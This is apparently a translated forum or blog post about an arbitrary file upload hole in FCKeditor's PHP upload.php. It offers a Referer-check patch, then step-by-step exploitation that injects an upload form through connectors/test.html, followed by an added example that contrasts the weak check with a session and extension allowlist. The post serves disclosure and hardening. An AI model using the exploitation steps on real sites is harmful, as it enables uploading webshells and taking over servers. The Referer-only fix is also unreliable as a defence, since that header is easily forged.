Vulnerable file: editors/fckeditor/editor/filemanager/upload/php/upload.php
The fix given online is:
Fix: remove the FCK editor and use a different editor,
or find the file editors/fckeditor/editor/filemanager/upload/php/upload.php
and, below the lines
require('config.php');
require('util.php');
add the following code:
// Prevent submissions from outside the site
function outsidepost()
{
    $servername=$_SERVER['SERVER_NAME'];
    $sub_from=@$_SERVER['HTTP_REFERER'];
    $sub_len=strlen($servername);
    // Skip the 7 characters of "http://" and take the host part of the Referer
    $checkfrom=substr($sub_from,7,$sub_len);
    if($checkfrom!=$servername){
        echo("you don't outsidepost!");
        exit;
    }
}
outsidepost();
This prevents submissions from outside the site, but it does not prevent submissions from inside the site.
Exploitation method:
1. Open editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
2. In the Current Folder box, enter
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
Then click Get Folders and Files; an upload form appears, and any file type can be uploaded through it.
PS: If the editors directory and the upload folder are configured to return 403, 500 or 404, the exploit does not work.
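
The limitation described above, as an added example (not code from FCKeditor or from the original post): the Referer check is evaluated against constructed header values, next to a server-side gate that does not rely on the Referer at all. The host name, the `editor_user` session key, the extension allowlist and both function names are assumptions.

```php
<?php
// Added example: not FCKeditor code. Function names, the 'editor_user'
// session key and the extension allowlist are assumptions.

// The Referer check from the post, returning a boolean instead of exiting.
function referer_check_passes(string $serverName, string $referer): bool
{
    return substr($referer, 7, strlen($serverName)) === $serverName;
}

// Gate that does not depend on Referer: require a logged-in session and
// an allowlisted extension on a file name with exactly one dot.
function upload_allowed(array $session, string $clientName, array $allowedExt): bool
{
    if (empty($session['editor_user'])) {
        return false; // no authenticated editor session
    }
    $name = basename(str_replace('\\', '/', $clientName));
    $parts = explode('.', strtolower($name));
    if (count($parts) !== 2 || $parts[0] === '') {
        return false; // no extension, dotfile, or double extension
    }
    return in_array($parts[1], $allowedExt, true);
}

// Constructed sample values.
$server = 'www.example.com';
$referers = [
    'same-site page'  => 'http://www.example.com/editors/fckeditor/editor/filemanager/browser/default/connectors/test.html',
    'other site'      => 'http://other.example.net/form.html',
    'https same-site' => 'https://www.example.com/admin/',
    'header absent'   => '',
];
foreach ($referers as $label => $referer) {
    printf("%-16s referer check: %s\n", $label, var_export(referer_check_passes($server, $referer), true));
}

$allowed = ['jpg', 'png', 'gif'];
$uploads = [
    [[], 'photo.jpg'],                            // anonymous request
    [['editor_user' => 'alice'], 'photo.jpg'],    // logged in, allowlisted
    [['editor_user' => 'alice'], 'page.php'],     // logged in, not allowlisted
    [['editor_user' => 'alice'], 'page.php.jpg'], // double extension
];
foreach ($uploads as [$session, $name]) {
    printf("%-14s upload allowed: %s\n", $name, var_export(upload_allowed($session, $name, $allowed), true));
}
```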